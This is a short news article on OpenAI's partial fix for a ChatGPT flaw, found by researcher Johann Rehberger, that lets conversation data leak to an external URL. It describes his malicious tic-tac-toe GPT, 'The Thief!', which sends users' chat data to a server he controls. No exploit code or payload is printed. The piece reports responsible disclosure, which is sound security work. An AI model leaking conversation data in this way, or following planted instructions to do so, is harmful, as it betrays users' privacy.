OpenAI rolls out imperfect fix for ChatGPT data leak flaw
OpenAI has mitigated a data exfiltration bug in ChatGPT that could potentially leak conversation details to an external URL.
According to the researcher who discovered the flaw, the mitigation isn't perfect, so attackers can still exploit it under certain conditions.
Also, the safety checks are yet to be implemented in the iOS mobile app for ChatGPT, so the risk on that platform remains unaddressed. Data leak problem
Security researcher Johann Rehberger discovered a technique to exfiltrate data from ChatGPT and reported it to OpenAI in April 2023. The researcher later shared in November 2023 additional information on creating malicious GPTs that leverage the flaw to phish users.
"This GPT and underlying instructions were promptly reported to OpenAI on November, 13th 2023," the researcher wrote in this disclosure.
"However, the ticket was closed on November 15th as "Not Applicable". Two follow up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness."
GPTs are custom AI models marketed as "AI apps," specializing in various roles such as customer support agents, assisting in writing and translation, performing data analysis, crafting cooking recipes based on available ingredients, gathering data for research, and even playing games.
Following the lack of response by the chatbot's vendor, the researcher decided to publicly disclose his findings on December 12, 2023, where he demonstrated a custom tic-tac-toe GPT named 'The Thief!,' which can exfiltrate conversation data to an external URL operated by the researcher.
Posted on: 12/26/2023 11:50:19 AM
|